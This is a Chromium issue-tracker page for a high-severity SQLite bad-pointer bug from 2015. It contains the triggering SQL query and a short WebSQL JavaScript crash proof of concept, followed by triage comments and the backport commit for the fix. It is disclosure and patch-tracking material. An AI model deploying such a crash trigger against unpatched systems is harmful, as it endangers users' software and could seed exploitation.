New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 3 users

Issue metadata

Status: Fixed
Owner:
ex-Googler
Closed: Mar 2015
Cc:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

Security: sqlite bad ptr access

Project Member Reported by lcamtuf@google.com, Mar 20 2015

Issue description

Reported upstream, but also filing here for tracking purposes. Will update with an upstream patch.

Offending query:

SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE"""""""";

...will cause sqlite to access an uninitialized ptr when handling expressions in order statements. Spewed out by AFL. Appears reproducible with WebSQL in Chrome. Crash PoC:

var db = window.openDatabase("DBName", "1.0", "description", 5*1024*1024);
db.transaction(function(tx) {
  tx.executeSql('SELECT 0 UNION SELECT 0 ORDER BY 1 COLLATE"""""""";', [], alert, alert);
});

 

Comment 1 by kenrb@chromium.org, Mar 20 2015

Labels: Security_Impact-Stable Security_Severity-High
Status: ExternalDependency

Comment 2 by lcamtuf@google.com, Mar 21 2015

The fix is in:

https://www.sqlite.org/src/info/eddc05e7bb31fae7

I'll leave it to you to decide if you want to cherry-pick or wait for the next release (3.8.9). The release will also include a bunch of other fuzzer fixes, but most of them are non-exploitable.
Owner: sh...@chromium.org

Comment 4 by sh...@chromium.org, Mar 23 2015

Do you do Chromium code reviews?  Wasn't clear from looking at logs.
https://codereview.chromium.org/1022423004/

cherry-pick because we don't have a set schedule for SQLite imports.  Patch had a couple rejects, but the merge seems fine.

Comment 5 by lcamtuf@google.com, Mar 25 2015

Nope, but pinged Abhishek off-bug. Thanks!
Cc: michaeln@chromium.org
Status: Fixed
Labels: M-42 Merge-Requested
Project Member

Comment 10 by ClusterFuzz, Mar 27 2015

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: M-41
Cc: timwillis@chromium.org

Comment 13 by amin...@google.com, Mar 27 2015

Labels: -Merge-Requested Merge-Review Hotlist-Merge-Review
[Automated comment] Request affecting a post-stable build (M41), manual review required.

Comment 14 by amin...@google.com, Mar 27 2015

Labels: Merge-Approved Hotlist-Merge-Approved
Approved for M42 (branch: 2311)
Labels: -M-41 -Merge-Review -Hotlist-Merge-Review
This fix will go out with M42.  -M-41.
Project Member

Comment 16 by bugdroid1@chromium.org, Mar 27 2015

Labels: -Merge-Approved merge-merged-2311
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/90856262ae6ae80bd6f478b820515e35c21f094b

commit 90856262ae6ae80bd6f478b820515e35c21f094b
Author: Scott Hess <shess@chromium.org>
Date: Fri Mar 27 22:52:32 2015

[sqlite backport] Fix collation dequoting.

Backport https://www.sqlite.org/src/info/eddc05e7bb31fae7
"Fix a problem causing collation sequence names to be dequoted
multiple times under some circumstances."

BUG= 469082 
TBR=inferno@chromium.org

Review URL: https://codereview.chromium.org/1022423004

Cr-Commit-Position: refs/heads/master@{#322165}
(cherry picked from commit 3e13a01e946b7df16a5b3702ac016b5784945a90)

Review URL: https://codereview.chromium.org/1037403003

Cr-Commit-Position: refs/branch-heads/2311@{#369}
Cr-Branched-From: 09b7de5dd7254947cd4306de907274fa63373d48-refs/heads/master@{#317474}

[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/amalgamation/sqlite3.c
[add] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/patches/0018-backport-Fix-collation-dequoting.patch
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/expr.c
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/parse.y
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/sqliteInt.h
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/src/where.c
[modify] http://crrev.com/90856262ae6ae80bd6f478b820515e35c21f094b/third_party/sqlite/src/test/collate1.test

Labels: Release-0-M42
Cc: thakis@chromium.org
 Issue 477340  has been merged into this issue.
Project Member

Comment 20 by ClusterFuzz, Jul 1 2015

Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Project Member

Comment 21 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 22 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic

Sign in to add a comment